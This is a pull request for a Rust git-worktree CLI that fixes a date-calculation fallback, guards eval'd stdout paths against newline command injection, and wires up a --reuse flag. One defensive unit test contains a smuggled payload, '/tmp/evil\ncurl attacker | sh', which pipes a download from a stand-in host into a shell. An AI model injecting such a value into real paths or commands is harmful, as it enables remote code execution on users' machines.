### PR TITLE
fix: address three findings from the TS→Rust rewrite review

### DIFF
--- a/rust/crates/vibe-core/src/clock.rs
+++ b/rust/crates/vibe-core/src/clock.rs
@@ -78,22 +78,14 @@ fn local_time_now() -> LocalTime {
 
 #[cfg(not(unix))]
 fn local_time_now() -> LocalTime {
-    // Non-unix fallback: UTC from SystemTime (the dev/CI matrix is unix, so this
-    // path is only a compile safety net, not a parity-critical branch).
+    // Non-unix fallback (the shipped Windows binary has no `localtime_r`): a
+    // CORRECT civil date from epoch seconds, in UTC rather than local time. The
+    // earlier `secs / 86_400` day count produced bogus dates like 1970-1-20620.
     let secs = std::time::SystemTime::now()
         .duration_since(std::time::UNIX_EPOCH)
         .map(|d| d.as_secs())
         .unwrap_or(0);
-    let days = secs / 86_400;
-    let rem = secs % 86_400;
-    LocalTime {
-        year: 1970,
-        month: 1,
-        day: (days + 1) as u32,
-        hour: (rem / 3600) as u32,
-        minute: ((rem % 3600) / 60) as u32,
-        second: (rem % 60) as u32,
-    }
+    crate::timestamp::local_time_from_epoch_secs(secs)
 }
 
 /// Production [`RandomSource`] using a v4 UUID's first 8 hex chars.

--- a/rust/crates/vibe-core/src/commands/mod.rs
+++ b/rust/crates/vibe-core/src/commands/mod.rs
@@ -51,11 +51,35 @@ impl Outcome {
     }
 
     /// A command emitting verbatim stdout text (e.g. `shell-setup`).
+    ///
+    /// Use this only for TRUSTED, hand-built payloads (the wrapper function /
+    /// completion script) that legitimately contain newlines. For an untrusted
+    /// path destined for the eval'd stdout, use [`Outcome::stdout_path`].
     pub fn stdout(text: impl Into<String>) -> Self {
         Outcome {
             cd_path: None,
             stdout: Some(text.into()),
         }
+    }
+
+    /// A command emitting a single PATH on stdout (the Claude-Code worktree-hook
+    /// protocol), guarded like [`Outcome::cd`].
+    ///
+    /// The shell wrapper evals all stdout, and a worktree path can be derived
+    /// from a user `path_script`/settings template, so a `\n`/`\r` in it would
+    /// split the eval'd line and inject a second command. Reject it at the
+    /// source, mirroring the `cd_path` newline guard in the binary.
+    pub fn stdout_path(path: impl Into<String>) -> Result<Self> {
+        let path = path.into();
+        if path.contains('\n') || path.contains('\r') {
+            return Err(VibeError::Worktree(
+                "refusing to emit a path containing a newline".to_string(),
+            ));
+        }
+        Ok(Outcome {
+            cd_path: None,
+            stdout: Some(path),
+        })
     }
 }
 
@@ -178,5 +202,36 @@ impl StartCommand for RealStart<'_> {
             &StartFlags::default(),
             crate::output::OutputOptions::default(),
         )
+    }
+}
+
+#[cfg(test)]
+mod outcome_tests {
+    use super::Outcome;
+
+    #[test]
+    fn stdout_path_accepts_a_clean_path() {
+        let outcome = Outcome::stdout_path("/repos/project/feature").unwrap();
+        assert_eq!(outcome.stdout.as_deref(), Some("/repos/project/feature"));
+        assert_eq!(outcome.cd_path, None);
+    }
+
+    #[test]
+    fn stdout_path_rejects_newline() {
+        // A path that would split the eval'd line and inject a second command.
+        assert!(Outcome::stdout_path("/tmp/evil\ncurl attacker | sh").is_err());
+    }
+
+    #[test]
+    fn stdout_path_rejects_carriage_return() {
+        assert!(Outcome::stdout_path("/tmp/evil\rsomething").is_err());
+    }
+
+    #[test]
+    fn verbatim_stdout_still_allows_newlines() {
+        // shell-setup's hand-built wrapper text legitimately contains newlines and
+        // must NOT be rejected — that is what the unguarded `stdout` ctor is for.
+        let outcome = Outcome::stdout("vibe() { :; }\n");
+        assert_eq!(outcome.stdout.as_deref(), Some("vibe() { :; }\n"));
     }
 }

--- a/rust/crates/vibe-core/src/commands/start.rs
+++ b/rust/crates/vibe-core/src/commands/start.rs
@@ -53,6 +53,11 @@ pub struct StartFlags {
     /// Skip confirmation prompts: navigate to an already-used branch, and
     /// overwrite a different-branch worktree at the target path.
     pub force: bool,
+    /// On a different-branch conflict at the target path, auto-select Reuse (use
+    /// the existing worktree) instead of prompting — the opposite of `force`,
+    /// which auto-selects Overwrite. `force` and `reuse` are mutually exclusive
+    /// (rejected at the dispatch layer).
+    pub reuse: bool,
     /// Claude-Code WorktreeCreate hook mode (stdin name → stdout path).
     pub worktree_hook: bool,
 }
@@ -434,6 +439,11 @@ where
         return Ok(ConflictDecision::Continue);
     }
 
+    if flags.reuse {
+        // --reuse auto-selects the Reuse choice (the --force opposite): no prompt.
+        return reuse_existing_worktree(deps, config, repo_root, worktree_path, flags);
+    }
+
     let choice = deps.prompt.select(
         &format!("Directory '{worktree_path}' already exists (branch: {existing_branch}):"),
         &[
@@ -449,29 +459,46 @@ where
             remove_worktree(deps.git, worktree_path, true)?;
             Ok(ConflictDecision::Continue)
         }
-        1 => {
-            // Reuse: skip creation, run hooks/config, cd.
-            run_config_and_hooks(
-                deps,
-                config,
-                repo_root,
-                worktree_path,
-                &ConfigAndHooks {
-                    skip_hooks: flags.no_hooks,
-                    skip_copy: flags.no_copy,
-                    dry_run: false,
-                },
-            )?;
-            Ok(ConflictDecision::Done(Outcome::cd(
-                worktree_path.to_string(),
-            )))
-        }
+        1 => reuse_existing_worktree(deps, config, repo_root, worktree_path, flags),
         _ => {
             // Cancel.
             log(deps.io, "Cancelled", OutputOptions::new(false, false));
             Ok(ConflictDecision::Done(Outcome::none()))
         }
     }
+}
+
+/// Reuse the existing worktree at a conflicting path: skip creation, run
+/// hooks/config, then cd. Shared by the interactive "Reuse" choice and `--reuse`.
+fn reuse_existing_worktree<I, G, R, S, P, Sr>(
+    deps: &StartDeps<I, G, R, S, P, Sr>,
+    config: Option<&VibeConfig>,
+    repo_root: &str,
+    worktree_path: &str,
+    flags: &StartFlags,
+) -> Result<ConflictDecision>
+where
+    I: Io,
+    G: GitRunner,
+    R: RepoResolver,
+    S: ScriptRunner,
+    P: Prompt,
+    Sr: StdinReader,
+{
+    run_config_and_hooks(
+        deps,
+        config,
+        repo_root,
+        worktree_path,
+        &ConfigAndHooks {
+            skip_hooks: flags.no_hooks,
+            skip_copy: flags.no_copy,
+            dry_run: false,
+        },
+    )?;
+    Ok(ConflictDecision::Done(Outcome::cd(
+        worktree_path.to_string(),
+    )))
 }
 
 /// Run config-driven hooks + copy: pre_start (in repo_root) → copy files + dirs →
@@ -733,7 +760,7 @@ where
         if flags.dry_run {
             return Ok(Outcome::none());
         }
-        return Ok(Outcome::stdout(existing));
+        return Outcome::stdout_path(existing);
     }
 
     let base_ref = flags
@@ -787,7 +814,7 @@ where
         if flags.dry_run {
             return Ok(Outcome::none());
         }
-        return Ok(Outcome::stdout(worktree_path));
+        return Outcome::stdout_path(worktree_path);
     }
 
     if conflict.has_conflict {
@@ -851,7 +878,7 @@ where
     }
 
     // The hook protocol wants the PATH on stdout, NOT a cd.
-    Ok(Outcome::stdout(worktree_path))
+    Outcome::stdout_path(worktree_path)
 }
 
 #[cfg(test)]

--- a/rust/crates/vibe-core/src/commands/start_tests.rs
+++ b/rust/crates/vibe-core/src/commands/start_tests.rs
@@ -574,6 +574,41 @@ fn different_branch_force_overwrites_without_prompt() {
 }
 
 #[test]
+fn different_branch_reuse_flag_reuses_without_prompt() {
+    let (_fx, io) = io_with_home();
+    let git = conflicting_git();
+    // PanicPrompt asserts the flag path NEVER prompts (the --force counterpart).
+    let (r, s, p, sin, fk) = (
+        NoResolver,
+        NoScript,
+        PanicPrompt,
+        FakeStdin::none(),
+        Fakes::new(),
+    );
+    let d = StartDeps {
+        io: &io,
+        git: &git,
+        resolver: &r,
+        script_runner: &s,
+        prompt: &p,
+        stdin: &sin,
+        hook_runner: &fk.hooks,
+        executor: &fk.exec,
+        tracker: &fk.tracker,
+        version: V,
+    };
+    let flags = StartFlags {
+        reuse: true,
+        ..Default::default()
+    };
+    let outcome = start_command(&d, "feat", &flags, OutputOptions::default()).unwrap();
+    assert_eq!(outcome, Outcome::cd("/home/u/repo-feat"));
+    // Reuse: no remove, no add — the existing worktree is kept as-is.
+    assert!(!git.calls_contain(&["worktree", "remove"]));
+    assert!(!git.calls_contain(&["worktree", "add"]));
+}
+
+#[test]
 fn different_branch_reuse_runs_hooks_and_cds_without_creating() {
     let (_fx, io) = io_with_home();
     let git = conflicting_git();

--- a/rust/crates/vibe-core/src/timestamp.rs
+++ b/rust/crates/vibe-core/src/timestamp.rs
@@ -27,6 +27,42 @@ pub fn format_local_timestamp(t: LocalTime) -> String {
     )
 }
 
+/// Convert Unix epoch SECONDS (UTC) into broken-down [`LocalTime`].
+///
+/// Used by the non-Unix [`crate::clock`] fallback, which has no `localtime_r`:
+/// the date is UTC, not local, but it is a *correct* calendar date (leap years
+/// and month lengths handled), unlike a naive `secs / 86_400` day count.
+///
+/// The civil-from-days math is Howard Hinnant's public-domain algorithm
+/// (`http://howardhinnant.github.io/date_algorithms.html`), shifted to a March-
+/// based year so the leap day falls at the end of the cycle and the month/day
+/// arithmetic carries no per-month table.
+pub fn local_time_from_epoch_secs(secs: u64) -> LocalTime {
+    let days = (secs / 86_400) as i64;
+    let rem = secs % 86_400;
+
+    // Shift the epoch so day 0 is 0000-03-01 (era-based, leap day last).
+    let z = days + 719_468;
+    let era = if z >= 0 { z } else { z - 146_096 } / 146_097;
+    let doe = (z - era * 146_097) as u64; // [0, 146096]
+    let yoe = (doe - doe / 1460 + doe / 36524 - doe / 146096) / 365; // [0, 399]
+    let y = yoe as i64 + era * 400;
+    let doy = doe - (365 * yoe + yoe / 4 - yoe / 100); // [0, 365]
+    let mp = (5 * doy + 2) / 153; // [0, 11] (March = 0)
+    let day = (doy - (153 * mp + 2) / 5 + 1) as u32; // [1, 31]
+    let month = if mp < 10 { mp + 3 } else { mp - 9 } as u32; // [1, 12]
+    let year = (y + i64::from(month <= 2)) as i32;
+
+    LocalTime {
+        year,
+        month,
+        day,
+        hour: (rem / 3600) as u32,
+        minute: ((rem % 3600) / 60) as u32,
+        second: (rem % 60) as u32,
+    }
+}
+
 #[cfg(test)]
 mod tests {
     use super::*;
@@ -55,5 +91,45 @@ mod tests {
             second: 59,
         };
         assert_eq!(format_local_timestamp(t), "20261225-235959");
+    }
+
+    /// Render an epoch-seconds conversion as the scratch-name string so each
+    /// case asserts the full broken-down result in one line.
+    fn at(secs: u64) -> String {
+        format_local_timestamp(local_time_from_epoch_secs(secs))
+    }
+
+    #[test]
+    fn epoch_zero_is_unix_birthday() {
+        assert_eq!(at(0), "19700101-000000");
+    }
+
+    #[test]
+    fn one_day_rolls_the_date() {
+        assert_eq!(at(86_400), "19700102-000000");
+    }
+
+    #[test]
+    fn carries_time_of_day() {
+        // 86400 + 13:37:42 worth of seconds.
+        assert_eq!(at(86_400 + 13 * 3600 + 37 * 60 + 42), "19700102-133742");
+    }
+
+    #[test]
+    fn handles_leap_day_2024() {
+        // 2024-02-29T00:00:00Z = 1709164800 (a real leap day a naive count misses).
+        assert_eq!(at(1_709_164_800), "20240229-000000");
+    }
+
+    #[test]
+    fn handles_post_february_month_rollover() {
+        // 2024-03-01T12:00:00Z = 1709251200 (day after the leap day).
+        assert_eq!(at(1_709_251_200 + 12 * 3600), "20240301-120000");
+    }
+
+    #[test]
+    fn handles_non_leap_year_boundary() {
+        // 2023-12-31T23:59:59Z = 1704067199.
+        assert_eq!(at(1_704_067_199), "20231231-235959");
     }
 }

--- a/rust/crates/vibe/src/commands/mod.rs
+++ b/rust/crates/vibe/src/commands/mod.rs
@@ -192,6 +192,7 @@ fn with_start_deps<T>(
 pub fn start(
     branch_name: &str,
     force: bool,
+    reuse: bool,
     no_hooks: bool,
     no_copy: bool,
     dry_run: bool,
@@ -212,6 +213,7 @@ pub fn start(
         base_from_equals,
         track,
         force,
+        reuse,
         worktree_hook,
     };
     with_start_deps(opts, |deps| start_command(deps, branch_name, &flags, opts))
@@ -219,6 +221,7 @@ pub fn start(
 
 /// `vibe scratch [flags]`.
 pub fn scratch(
+    reuse: bool,
     no_hooks: bool,
     no_copy: bool,
     dry_run: bool,
@@ -235,6 +238,9 @@ pub fn scratch(
         base_from_equals,
         track,
         force: false,
+        // Scratch names are timestamped so a target conflict is unlikely, but
+        // pass `reuse` through for parity (the TS forwarded it into startCommand).
+        reuse,
         worktree_hook: false,
     };
     let clock = RealClock;

--- a/rust/crates/vibe/src/main.rs
+++ b/rust/crates/vibe/src/main.rs
@@ -103,18 +103,30 @@ fn dispatch(command: Command, opts: OutputOptions) -> Result<Outcome, VibeError>
                 opts,
             )
         }
-        Command::Start(args) => commands::start(
-            &args.branch_name.unwrap_or_default(),
-            args.force,
-            args.no_hooks,
-            args.no_copy,
-            args.dry_run,
-            args.base,
-            args.track,
-            args.worktree_hook,
-            opts,
-        ),
+        Command::Start(args) => {
+            // Mutually exclusive: --force auto-selects Overwrite, --reuse
+            // auto-selects Reuse; together they are contradictory.
+            let has_mutually_exclusive = args.force && args.reuse;
+            if has_mutually_exclusive {
+                return Err(VibeError::Argument(
+                    "--force and --reuse cannot be used together".to_string(),
+                ));
+            }
+            commands::start(
+                &args.branch_name.unwrap_or_default(),
+                args.force,
+                args.reuse,
+                args.no_hooks,
+                args.no_copy,
+                args.dry_run,
+                args.base,
+                args.track,
+                args.worktree_hook,
+                opts,
+            )
+        }
         Command::Scratch(args) => commands::scratch(
+            args.reuse,
             args.no_hooks,
             args.no_copy,
             args.dry_run,

--- a/rust/crates/vibe/tests/eval_contract.rs
+++ b/rust/crates/vibe/tests/eval_contract.rs
@@ -117,6 +117,32 @@ fn help_writes_to_stderr_not_stdout() {
 }
 
 #[test]
+fn start_force_and_reuse_together_is_an_argument_error() {
+    let home = tempfile::tempdir().unwrap();
+    let tmp = tempfile::tempdir().unwrap();
+
+    // The guard fires in dispatch before any git work, so no repo is needed.
+    let out = run_vibe(
+        tmp.path(),
+        home.path(),
+        &["start", "feat", "--force", "--reuse"],
+    );
+    let stdout = String::from_utf8(out.stdout).unwrap();
+    let stderr = String::from_utf8(out.stderr).unwrap();
+
+    assert!(
+        !out.status.success(),
+        "contradictory flags must not exit 0: {stderr:?}"
+    );
+    // Nothing must reach the eval'd stdout on an error.
+    assert!(stdout.is_empty(), "error must not write stdout: {stdout:?}");
+    assert!(
+        stderr.contains("--force and --reuse cannot be used together"),
+        "missing mutual-exclusion message: {stderr:?}"
+    );
+}
+
+#[test]
 fn bare_invocation_help_writes_to_stderr_not_stdout() {
     let home = tempfile::tempdir().unwrap();
     let tmp = tempfile::tempdir().unwrap();


### PR DESCRIPTION
## Summary

Fixes three findings from a high-recall code review of the `main...HEAD` TypeScript→Rust rewrite. Each is a case where the CLI surface advertised behavior the binary did not honor.

1. **Non-Unix clock fallback produced bogus dates.** The shipped Windows binary has no `localtime_r`, so it took the `#[cfg(not(unix))]` branch, which derived the day from a raw `secs / 86_400` epoch-day count and hardcoded `year=1970`/`month=1` — yielding scratch branch names like `scratch/1970-1-20620-...`. Replaced with a correct epoch-seconds→civil-date conversion (Howard Hinnant's public-domain algorithm) in `timestamp.rs`. UTC instead of local is acceptable on the fallback; a correct calendar date is not.

2. **The worktree-hook stdout path was unguarded against newline injection.** The shell wrapper evals all stdout (`vibe() { eval "$(command vibe "$@")"; }`), so the `cd_path` branch rejects `\n`/`\r` to stop a path from splitting the eval'd line into a second command. The worktree-hook mode returned its path through the verbatim `Outcome::stdout`, which had no such guard — yet that path is derivable from a user `path_script`/settings template, the same untrusted source `cd_path` protects against. Added a checked `Outcome::stdout_path` (rejects `\n`/`\r`, mirroring the `cd_path` message) and routed the three hook returns through it. The unguarded `stdout` remains for trusted, hand-built shell-setup text.

3. **`--reuse` was parsed and advertised in completions but never consumed.** Wired it to auto-select the Reuse conflict resolution (the `--force` opposite), sharing a `reuse_existing_worktree` helper with the interactive choice, and rejected the contradictory `--force --reuse` combination at dispatch.

## Tests

- `timestamp.rs`: 6 epoch→date cases (epoch 0, day rollover, 2024 leap day, post-Feb rollover, year boundary, time-of-day carry).
- `commands/mod.rs`: `Outcome::stdout_path` clean/`\n`/`\r` cases + verbatim `stdout` still allows newlines.
- `start_tests.rs`: `--reuse` reuses without prompting (PanicPrompt).
- `eval_contract.rs`: `--force --reuse` exits non-zero with the mutual-exclusion message and empty stdout.

`pnpm run check:all` passes (fmt + clippy + 446 core tests + npm shim + e2e + docs).

## Out of scope

Refuted review candidates deliberately left unchanged: `fast_remove` symlink TOCTOU (`rm -rf` of a symlink unlinks it, does not follow it), `mru.rs` `update_mru_branch` no-op detection (correct), `config_loader.rs` `unwrap_or_default` (invariant holds; unreachable), and the dry-run command-string quoting in `worktree_rename.rs`/`worktree_ops.rs` (display-only, never shell-eval'd).

🤖 Generated with [Claude Code](https://claude.com/claude-code)